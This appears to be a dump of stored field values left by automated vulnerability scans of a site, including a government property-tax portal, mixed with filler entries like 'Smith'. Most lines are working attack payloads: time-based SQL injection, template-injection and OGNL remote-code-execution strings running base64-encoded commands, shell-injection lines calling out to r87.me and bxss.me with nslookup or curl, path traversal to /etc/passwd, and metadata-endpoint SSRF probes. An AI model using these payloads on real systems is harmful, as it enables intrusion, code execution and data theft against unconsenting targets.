2996 +gethostbyname(trim('sbrj_544ntz8s8fyzj1_engrnnnwacfiz6zffhxq'.'dug.r87.me'));//
2997
2998 127.100.11.2/elmah.axd
2999
3000 Smith 164.100.223.17/elmah.axd
3001 Smith '{${gethostbyname(trim('sbrj_544ntiqjos3zlj7uzhjggikqmpz6ztpnvvb'.'foa.r87.me'))}}'
3002 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 9a4038b7-2da4-4bc0-8e5b-e835c20ffe7c */
3003 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* c81bc20d-67ae-4b38-be73-da76b58b007f */
3004 '{${gethostbyname(trim('sbrj_544nt-sov6vbntpar6g1mdkfr8oufffmy1x'.'bp0.r87.me'))}}'
3005 createobject("WScript.Shell").exec("nslookup sbrj_544ntdus6tyhch4mivktr05b2p17qfmx3bj" & "v5k.r87.me").StdOut.ReadAll
3006 Smith '+gethostbyname(trim('sbrj_544ntt5yjoy_eav8himjp1uu3bumnpckxn3'.'dxi.r87.me'))+'
3007 '+gethostbyname(trim('sbrj_544ntnub91i_torxtpebgj_5m5n1xchem6o'.'u_s.r87.me'))+'
3008 Smith propertytax.jk.gov.in/elmah.axd
3009 Smith 127.100.11.2/elmah.axd
3010 ' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 475b4ef8-c6ee-4882-8297-e04995c21fd1 */
3011 "+gethostbyname(trim('sbrj_544nts5jcc10gt0crj6ay75hmrxl66b7wk5'.'vsg.r87.me'))+"
3012 Smith createobject("WScript.Shell").exec("nslookup sbrj_544ntavlvfnpt2rgmnwd8esxnsrx4swrkgw" & "cv8.r87.me").StdOut.ReadAll
3013
3014 -1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 0e5c45b0-21ce-45a4-9861-10bab39779ef */
3015 Smith "+gethostbyname(lc 'sbrj_544nte491hzrz5pqys6ehh6aonkfvjlbvfv'.'nwe.r87.me')+"
3016 "+gethostbyname(lc 'sbrj_544ntnve_yn6irfbhvv7d8uh8yv6c57qrlf'.'pjq.r87.me')+"
3017
3018 Smith 127.0.0.1/elmah
3019 Smith [::1]/elmah
3020 127.0.0.1/elmah
3021 nslookup sbrj_544ntpa5dwn0vw8wiq3qhzfx-n6x23jduks^isg.r87.me&'\"`0&nslookup sbrj_544ntpa5dwn0vw8wiq3qhzfx-n6x23jduks^isg.r87.me&`'
3022 http://169.254.169.254/opc/v1/instance
3023 Smith https://propertytax.jk.gov.in/server-status
3024
3025 Smith "&nslookup "sbrj_544ntn-bgds4axzlvjrkqcm3oro7qsvkqya""oza.r87.me"
3026 Smith |nslookup${IFS}"sbrj_544ntvhlzkpnb7dkvugz4g_hon18h6rk8zo""zjk.r87.me"
3027 Smith http://[::1]:3306
3028 Smith = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudGJuMWJmcDMwdnNub2R4dG5uc2YtandmdGRsbHo1aWg2cy5yODcubWU=','base64').toString())
3029 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudGlhNGk2d3BkbmxxajJvbmJxZ3FxZHlxZDFsaXJ4eWVrbS5yODcubWU=','base64').toString())
3030 Smith
3031 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnYzJKeWFsODFORFJ1ZEhoaGVEQjBkbWh5Ym1nemRHVjRkWEZ3WTIwM2MyWnZNbWxyTFdoM2VXUmhiUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %
3032 Smith
3033 Smith {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudHNrY3BhcGx4bGwzaDk3bjBxOG1xcm1mcnJiNXBlb3Njdy5yODcubWU=')).read()}}
3034
3035 Smith %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "sbrj_544ntbpeou9r6dtitvd7yyngbgfnvopmtus"d9y.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redire
3036 Smith {php}Smarty_Resource::parseResourceName(system("nslookup sbrj_544ntbegjpupuvizl7qtoeqg6buhojmbmsi"."zzs.r87.me"),'b');{/php}
3037 Smith {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup sbrj_544ntyz_q_dxeg00uc3tgpndtkl1a_aabxz"~"xdo.r87.me")}}
3038 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup sbrj_544ntljkhgto2rf5lwqktfcsjxtwzexm_fl"~"o6a.r87.me")}}
3039 Smith <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudGctbDlidi1jemdmd3lkcHRjMy12cmRtcmFxZ3JoZW0tcS5yODcubWU=','base64').toString()) %>
3040 Smith
3041 <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgc2Jyal81NDRudF9fa2tpZmVrM29tcmV6bjJwbi16YmcwaWJ5aDByeDVtNC5yODcubWU=')})).to_s}" %>
3042
3043 Smith
3044 Smith
3045 Smith
3046 Smith
3047 Smith
3048 Smith
3049 Smith
3050 Smith
3051
3052
3053 Smith
3054
3055
3056 Smith
3057 Smith
3058 Smith
3059 Smith
3060 Smith
3061
3062 Smith
3063 Smith
3064 Smith
3065
3066
3067 Smith
3068 Smith
3069 Smith
3070 Smith
3071
3072
3073 Smith %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."sbrj_544ntygn2ycjy7-emi1wqwwjdv7ao9yf-3k""kee.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})
3074
3075
3076
3077 Smith
3078 Smith
3079 Smith
3080
3081
3082
3083
3084
3085 Smith
3086 Smith
3087 Smith
3088 Smith
3089 Smith
3090 Smith
3091
3092
3093
3094 Smith
3095 Smith
3096 Smith
3097
3098 Smith
3099 Smith
3100 Smith
3101
3102 Smith
3103 Smith
3104 Smith
3105
3106
3107
3108
3109
3110 Smith
3111 Smith
3112
3113
3114
3115
3116
3117
3118 Smith
3119 Smith
3120
3121
3122
3123
3124 Smith
3125 Smith
3126 Smith
3127 Smith
3128 Smith
3129
3130 Smith
3131 Smith
3132 Smith
3133 Smith
3134 Smith
3135
3136 Smith
3137
3138
3139
3140
3141
3142 Smith
3143 Smith
3144 Smith
3145 ' WAITFOR DELAY '0:0:25'-- /* be4f70f1-fe17-417d-bba6-e3a00e861b84 */
3146 ' WAITFOR DELAY '0:0:1'-- /* a5399683-8c24-480f-a27a-66db618b0300 */
3147 ' WAITFOR DELAY '0:0:1'-- /* 315e17d1-3693-44f8-8f47-5347e6126f23 */
3148 ' WAITFOR DELAY '0:0:30'-- /* 6b9e7f30-cfe1-4b02-bbd1-76a6a25b12b4 */
3149 ' WAITFOR DELAY '0:0:30'-- /* ce7c9949-51bf-4d28-ab95-07fb180c6a9d */
3150 Smith ' WAITFOR DELAY '0:0:25'-- /* cb3f1482-4a8f-41c3-b281-176ec58618ac */
3151 Smith ' WAITFOR DELAY '0:0:1'-- /* 298b6101-7be6-4e88-9a24-9a37f56da962 */
3152 Smith ' WAITFOR DELAY '0:0:1'-- /* f5c3b6b2-9fc9-44f4-8dac-0311b5824203 */
3153 1 WAITFOR DELAY '0:0:25'-- /* 2cac9639-b484-4e54-88b2-6f9ff591d311 */
3154 Smith 1 WAITFOR DELAY '0:0:25'-- /* 754ea942-9955-4a50-b5ac-a434dea9c77e */
3155 WAITFOR DELAY '0:0:25'-- /* 86048d5b-f1a3-43a5-9a02-7ee9e8d3be02 */
3156 WAITFOR DELAY '0:0:1'-- /* cce3f9d7-7fdd-4206-822f-1445e8d9aed4 */
3157 WAITFOR DELAY '0:0:1'-- /* fb8d4aca-47d0-46a4-8a8d-8d61e9fcbb05 */
3158 Smith WAITFOR DELAY '0:0:25'-- /* f6c790c1-e97e-4fd5-8c36-6a064bd07855 */
3159 1) WAITFOR DELAY '0:0:25'-- /* 85e6716a-8a5c-4bfb-abd9-8791b1d9463e */
3160 1) WAITFOR DELAY '0:0:1'-- /* d3cae188-3733-4583-8a3d-a1d22d10ae15 */
3161 1) WAITFOR DELAY '0:0:1'-- /* bae3cd56-ec3f-476c-958a-5eb94aae7ac0 */
3162 Smith 1) WAITFOR DELAY '0:0:25'-- /* 782ce575-9b8f-45a8-89fb-175bc84da646 */
3163 Smith 1) WAITFOR DELAY '0:0:1'-- /* ca6b8f61-f443-4f11-8a82-f3d2d34f1288 */
3164 Smith 1) WAITFOR DELAY '0:0:1'-- /* 1c5a5c16-99a8-4923-b9fe-098f587150fb */
3165 Smith 1) WAITFOR DELAY '0:0:30'-- /* fead6f3a-fbd3-4ffb-b760-934ab100f5a0 */
3166 Smith 1) WAITFOR DELAY '0:0:30'-- /* 97a1c62a-cf79-4ab0-913a-5f6f00966d2c */
3167 ') WAITFOR DELAY '0:0:25'-- /* 31bd24c2-05e2-4274-a85d-161a49e11da5 */
3168 WAITFOR DELAY '0:0:1'-- /* cce3f9d7-7fdd-4206-822f-1445e8d9aed4 */
3169 ') WAITFOR DELAY '0:0:1'-- /* 4be74701-acfc-484e-9b61-df79118d5564 */
3170 Smith
3171 ') WAITFOR DELAY '0:0:1'-- /* 74e88bf8-0b5b-42f8-a1ab-38d29f51d712 */
3172 ' WAITFOR DELAY '0:0:30'-- /* 6b9e7f30-cfe1-4b02-bbd1-76a6a25b12b4 */
3173 Smith ') WAITFOR DELAY '0:0:25'-- /* 7e4db727-b7ed-4f11-8fcf-496d91344b25 */
3174 ')) WAITFOR DELAY '0:0:25'-- /* 8f288981-0856-4289-9679-3f2ab46cf55b */
3175 ')) WAITFOR DELAY '0:0:1'-- /* d4909ff5-d7a6-4f0b-91d2-64d101a8a7d5 */
3176 ')) WAITFOR DELAY '0:0:1'-- /* 67d92a94-0282-4e82-bb10-4b6f8c7ef726 */
3177 Smith ')) WAITFOR DELAY '0:0:25'-- /* ca419bb2-719c-4050-9f34-f4c6c3ccea0f */
3178 1)) WAITFOR DELAY '0:0:25'-- /* e5edf709-9b3a-4084-bca0-2221ba0681f6 */
3179 Smith 1)) WAITFOR DELAY '0:0:25'-- /* b0ecedfc-522e-412d-b17d-d2266252f9f7 */
3180 Smith 1)) WAITFOR DELAY '0:0:1'-- /* 640bd434-804e-4d8b-873a-3052fcaa941b */
3181 Smith 1)) WAITFOR DELAY '0:0:1'-- /* e51e80ce-f3b3-4629-8a61-f6942301df46 */
3182 Smith 1)) WAITFOR DELAY '0:0:30'-- /* 5286c4b4-f296-4883-82ff-0c933c3f27f5 */
3183 Smith 1)) WAITFOR DELAY '0:0:30'-- /* ec493c2c-41ed-4f61-a396-0106aa0f35a5 */
3184 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 653ab997-8da6-4b9b-b69f-d61fe0930413 */
3185 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/**/@x-- /* ad2e5a80-56cc-463a-a3a8-3c50bf2e34fe */
3186 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/**/@x-- /* 3531a7c1-b332-466a-96d1-0c1b143afc28 */
3187 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/**/DELAY/**/@x-- /* a02d367d-b751-4ae9-aa6d-d4235d301550 */
3188 ') WAITFOR DELAY '0:0:1'-- /* 4be74701-acfc-484e-9b61-df79118d5564 */
3189 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(51)+char(48);WAITFOR/**/DELAY/**/@x-- /* f60474de-db0e-46e8-bf64-59275e82f347 */
3190 Smith 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 5f56697f-56ab-4267-98e3-12d4657b89d3 */
3191 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 60aa4c2e-16b3-4541-9ea8-a9dfced3ca32 */
3192 ') WAITFOR DELAY '0:0:1'-- /* 4be74701-acfc-484e-9b61-df79118d5564 */
3193 Smith 1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* eec5b73b-18cb-4994-9645-8fc16c6b96ba */
3194 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 1c92a225-a5ac-40f6-8c12-f7d09e72db6a */
3195 Smith 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 4d4a2820-3deb-44f0-aa05-601e1618d56d */
3196 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 1c9a572b-8f66-4d9e-9e66-41cee427bfe5 */
3197 Smith syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- /* 25b109b6-89f8-4ef9-8c68-130ab1522daa */
3198 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* 333f3c0d-51ee-44a7-86a3-cc1e6580e50b */
3199 Smith + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/ /* ef347d38-cd4d-4080-890c-5a8929ecb2b5 */
3200
3201 -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 6680f227-4d1a-4715-bf99-3e2f3320160f */
3202 Smith -1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 /* 81db4db1-58a4-4195-b8ed-daf67f982e2c */
3203 ((select sleep(25)))a-- 1 /* 88d5c06a-8b5b-4354-a541-6fde68487bfd */
3204 Smith ((select sleep(25)))a-- 1 /* adc60519-f228-4719-b0ef-dab318ebf17a */
3205 (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 7a3b841a-806f-4ac6-b4c4-44c94ff6212c */
3206 Smith (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) /* 58c8695a-3991-44e2-be5f-bc4d9bc6b5ed */
3207 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* be032d4a-9592-4272-8104-33efe0fcb0c4 */
3208 Smith 1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' /* 29b31509-8b8e-4d6a-a18a-a76c0dd1d1ec */
3209 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* f960b2f1-9795-46ee-b553-b7512d272b3f */
3210 Smith
3211 Smith 1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 /* 3be18839-7c33-4679-bdf8-a609e73dab8b */
3212 ';SELECT pg_sleep(25)-- /* 123fee5a-afb7-400a-8f46-f1853a6fae77 */
3213 Smith ';SELECT pg_sleep(25)-- /* 2e04b4b0-c0e7-43c2-aada-ef0c7f4d64b9 */
3214 Smith
3215 ;SELECT pg_sleep(25)-- /* 5a40a561-b2bb-47ee-9a49-4626022a7873 */
3216 Smith
3217 Smith
3218 Smith ;SELECT pg_sleep(25)-- /* 9b6e2f7e-cdd1-447b-bd40-dec71e1042ba */
3219
3220 Smith
3221 SELECT pg_sleep(25)-- /* f29dc4ab-4a03-4de8-b3ee-7bd7f7887e36 */
3222 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudHhjd25kaXF1dHdrZTlraHc5Y20tbHV0dHU5cnJiZ2wtcS5yODcubWU=')).read()
3223 Smith require 'resolv';Resolv.getaddress ("sbrj_544nt1ksjqtiu8-4u8mzvchz4nbdtftfkun".concat "bjs.r87.me")
3224 Smith SELECT pg_sleep(25)-- /* 9f4eb002-9638-456c-9746-562ce7268957 */
3225 require 'resolv';Resolv.getaddress ("sbrj_544ntgecjimtudjjgqcdu_xzj10junhvtsq".concat "zxw.r87.me")
3226 Smith
3227 <#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup sbrj_544nt2juehffrkwejsibe3klml2d_pyca26"+"rdq.r87.me") }
3228 Smith <%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgc2Jyal81NDRudF9ydGxjYXAtdnZfb203MWU0dGl4MXNyY3h0Y21sYmhhaS5yODcubWU=')})).to_s}" %>
3229
3230 <%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgc2Jyal81NDRudGNtcWE5NmNoemVsMWp4cGtpejNjdnBxazBfdWhwbnhraS5yODcubWU=','base64').toString()) %>
3231 Smith
3232 {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgc2Jyal81NDRudGd4YTg5dm1ucnljZnh0YXFyZjdrcS15bjk4YWdkZjF1Zy5yODcubWU=')).read()}}
3233 https://metadata.packet.net/metadata
3234 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."sbrj_544ntx2cdayoqglhtzw8houlm0mdx_lsa80""xii.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})
3235 Smith
3236 http://[::1]:3306
3237 Smith http://164.100.223.17:3306
3238 &nslookup "sbrj_544ntuuehgcfevlgbv2mihnnwqufci6ulsk""rxi.r87.me"
3239
3240 http://127.0.0.1:3306
3241 Smith
3242 Smith http://164.100.223.17:22
3243 '& nslookup sbrj_544ntdfwmeks9uwowowhf4ijdj_aanrzkrh^6s4.r87.me&'\"`0&nslookup sbrj_544ntdfwmeks9uwowowhf4ijdj_aanrzkrh^6s4.r87.me&`'
3244
3245 Smith & nslookup sbrj_544ntwquwwba0x6jstd8fprue9mmglxdj2l^gfc.r87.me&'\"`0&nslookup sbrj_544ntwquwwba0x6jstd8fprue9mmglxdj2l^gfc.r87.me&`'
3246 & nslookup sbrj_544nt9zfgv0xo4ngp4slznjgxlcl7prjolk^mmm.r87.me&'\"`0&nslookup sbrj_544nt9zfgv0xo4ngp4slznjgxlcl7prjolk^mmm.r87.me&`'
3247 Smith http://aws.r87.me/latest/meta-data/public-hostname
3248 http://aws.r87.me/latest/meta-data/public-hostname
3249 Smith
3250 Smith eval('gethostbyname(lc 'sbrj_544nt_qvbmivuw2qbseol2zo1ldpqgoqg0m'.'znm.r87.me')')
3251 127.100.11.2/elmah
3252 Smith gethostbyname(lc 'sbrj_544ntqskowdqr5kieiqyzuljy0a6zbebbdx'.'w24.r87.me')
3253 gethostbyname(lc 'sbrj_544ntd-fnptznkihodx_1juiybmvc8rvzaf'.'9_c.r87.me')
3254 164.100.223.17/elmah
3255 Smith propertytax.jk.gov.in/elmah
3256 Smith "+createobject("WScript.Shell").exec("nslookup sbrj_544ntbu3xycj4v9bohmhwau3ngp4whj17an" & "ola.r87.me").StdOut.ReadAll+"
3257 "+createobject("WScript.Shell").exec("nslookup sbrj_544nt7nvj0o5-o4to4enet-vcqaoj2ohidr" & "wmy.r87.me").StdOut.ReadAll+"
3258
3259 Smith
3260 Smith <%createobject("WScript.Shell").exec("nslookup sbrj_544ntsj0eyzifvh5q43ogs1a5pscjczfvsx" & "1le.r87.me").StdOut.ReadAll%>
3261 https://propertytax.jk.gov.in/elmah
3262 Smith [::1]/elmah.axd
3263
3264 Smith +createobject("WScript.Shell").exec("nslookup sbrj_544ntfo6izmy7imcef7jlj3yihwzyhzqiuh" & "bgw.r87.me").StdOut.ReadAll+
3265
3266 +createobject("WScript.Shell").exec("nslookup sbrj_544ntk184gk6jq6tk5fp6fbthr2wxyilbqf" & "uyi.r87.me").StdOut.ReadAll+
3267 127.0.0.1/elmah.axd
3268 +createobject("WScript.Shell").exec("nslookup sbrj_544ntj7u5j7wvyjibpjeu19ehx6ofgalog6" & "5qu.r87.me").StdOut.ReadAll
3269 ') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 215483f1-e167-4e6b-9fb1-3580767ffa3b */
3270 https://propertytax.jk.gov.in/trace.axd
3271 -1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* 84b0cddf-5476-48e0-94f9-722da5ebbbad */
3272 Smith
3273 Smith
3274
3275
3276 Smith
3277 Smith
3278 Smith
3279
3280
3281
3282
3283 Smith
3284 Smith
3285
3286
3287 //r87.com/?0x009B20
3288 '+((SELECT 1 FROM (SELECT SLEEP(1))A))+' /* 759e7deb-256e-4ebb-9c68-859179ebeabe */
3289 Smith
3290
3291 Smith %22%2bnetsparker(0x009ADA)%2b%22
3292 %22%2bnetsparker(0x009AD9)%2b%22
3293
3294 Smith
3295 Smith
3296
3297 1'));SELECT pg_sleep(1)-- /* 4d00443e-8b94-4aec-b66d-63910b768f92 */
3298 Smith
3299 Smith 3
3300 Smith 3
3301
3302
3303
3304
3305
3306
3307
3308
3309
3310
3311
3312
3313
3314
3315
3316 Smith
3317 Smith
3318 Smith
3319 Smith
3320 & ping -n 1 127.0.0.1 &
3321 & ping -n 1 127.0.0.1 &
3322 & ping -n 6 127.0.0.1 &
3323 & ping -n 6 127.0.0.1 &
3324 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
3325 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY
3326 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(54);WAITFOR/**/DELAY
3327 1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(54);WAITFOR/**/DELAY
3328 Smith
3329 Smith
3330 Smith
3331 Smith
3332
3333
3334
3335
3336 ' WAITFOR DELAY '0:0:1'-- /* 15dad9cb-950a-4c41-b7c0-20cfb31b3651 */
3337 ' WAITFOR DELAY '0:0:1'-- /* 3907439e-168f-4aba-9440-d7e16d7b67f7 */
3338 ' WAITFOR DELAY '0:0:6'-- /* ea7dc1c8-6b6e-4213-8322-59b04ebedeb8 */
3339 ' WAITFOR DELAY '0:0:6'-- /* 688d0da3-d785-44dc-ba76-474cddfc3e1a */
3340
3341
3342
3343
3344 pHqghUme 555
3345 pHqghUme response.write(9776886*9344240)
3346 pHqghUme '+response.write(9776886*9344240)+'
3347 pHqghUme /../../../../../../../../../../windows/system32/BITSADMIN.exe
3348 pHqghUme "+response.write(9776886*9344240)+"
3349 pHqghUme echo lfymlc$()\ oyillp\nz^xyu||a #' &echo lfymlc$()\ oyillp\nz^xyu||a #|" &echo lfymlc$()\ oyillp\nz^xyu||a #
3350 /../../../../../../../../../../windows/system32/BITSADMIN.exe 555
3351 pHqghUme <% response.write(9776886*9344240) %>
3352 pHqghUme &echo yrynrw$()\ mtcecn\nz^xyu||a #' &echo yrynrw$()\ mtcecn\nz^xyu||a #|" &echo yrynrw$()\ mtcecn\nz^xyu||a #
3353 pHqghUme +response.write(9776886*9344240)'
3354 pHqghUme ../../../../../../../../../../../../../../etc/passwd
3355 pHqghUme 555&echo ifinyr$()\ xsnxje\nz^xyu||a #' &echo ifinyr$()\ xsnxje\nz^xyu||a #|" &echo ifinyr$()\ xsnxje\nz^xyu||a #
3356 response.write(9285340*9414872) 555
3357 pHqghUme |echo ciuxlb$()\ tfcehb\nz^xyu||a #' |echo ciuxlb$()\ tfcehb\nz^xyu||a #|" |echo ciuxlb$()\ tfcehb\nz^xyu||a #
3358 '+response.write(9285340*9414872)+' 555
3359 pHqghUme ../../../../../../../../../../../../../../windows/win.ini
3360 pHqghUme 555|echo mblinq$()\ totxua\nz^xyu||a #' |echo mblinq$()\ totxua\nz^xyu||a #|" |echo mblinq$()\ totxua\nz^xyu||a #
3361 pHqghUme file:///etc/passwd
3362 pHqghUme ${10000105+9999981}
3363 pHqghUme (nslookup -q=cname hitekkfwsdjfj13109.bxss.me||curl hitekkfwsdjfj13109.bxss.me))
3364 pHqghUme 555
3365 pHqghUme 555
3366 pHqghUme http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
3367 ${10000274+9999825} 555
3368 pHqghUme $(nslookup -q=cname hityrzmoaicxs4d7b5.bxss.me||curl hityrzmoaicxs4d7b5.bxss.me)
3369 "+response.write(9285340*9414872)+" 555
3370 pHqghUme 1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
3371 pHqghUme ../555
3372 pHqghUme &nslookup -q=cname hitiacudvudah49777.bxss.me&'\"`0&nslookup -q=cname hitiacudvudah49777.bxss.me&`'
3373 U0NyTnlPbjI= 555
3374 <% response.write(9285340*9414872) %> 555
3375 pHqghUme Http://bxss.me/t/fit.txt
3376 pHqghUme )
3377 pHqghUme ./555
3378 pHqghUme
3379 pHqghUme http://bxss.me/t/fit.txt?.jpg
3380 pHqghUme &(nslookup -q=cname hityltzrblvgzcb339.bxss.me||curl hityltzrblvgzcb339.bxss.me)&'\"`0&(nslookup -q=cname hityltzrblvgzcb339.bxss.me||curl hityltzrblvgzcb339.bxss.me)&`'
3381 pHqghUme 555
3382 pHqghUme !(()&&!|*|*|
3383 pHqghUme /etc/shells
3384 +response.write(9285340*9414872)' 555
3385 ../../../../../../../../../../../../../../etc/passwd 555
3386 pHqghUme ^(#$!@#$)(()))******
3387 pHqghUme
3388 pHqghUme |(nslookup -q=cname hitykgdsfknaq6d0df.bxss.me||curl hitykgdsfknaq6d0df.bxss.me)
3389 ../../../../../../../../../../../../../../windows/win.ini 555
3390 ) 555
3391 pHqghUme ../../../../../../../../../../../../../../etc/shells
3392 pHqghUme '"()
3393 !(()&&!|*|*| 555
3394 pHqghUme `(nslookup -q=cname hitqhfayharaz4e126.bxss.me||curl hitqhfayharaz4e126.bxss.me)`
3395 pHqghUme c:/windows/win.ini
3396 file:///etc/passwd 555
3397 ^(#$!@#$)(()))****** 555
3398 pHqghUme ;(nslookup -q=cname hitydtjywetmz53f71.bxss.me||curl hitydtjywetmz53f71.bxss.me)|(nslookup -q=cname hitydtjywetmz53f71.bxss.me||curl hitydtjywetmz53f71.bxss.me)&(nslookup -q=cname hitydtjywetmz53f71.bxss.me||curl hitydtjywetmz53f71.bxss.me)
3399 pHqghUme 555'&&sleep(27*1000)*rgzrgw&&'
3400 pHqghUme 555
3401 pHqghUme bxss.me
3402 pHqghUme |(nslookup${IFS}-q${IFS}cname${IFS}hitwtdbjvpolkbb3c6.bxss.me||curl${IFS}hitwtdbjvpolkbb3c6.bxss.me)
3403 ../pHqghUme 555
3404 http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg 555
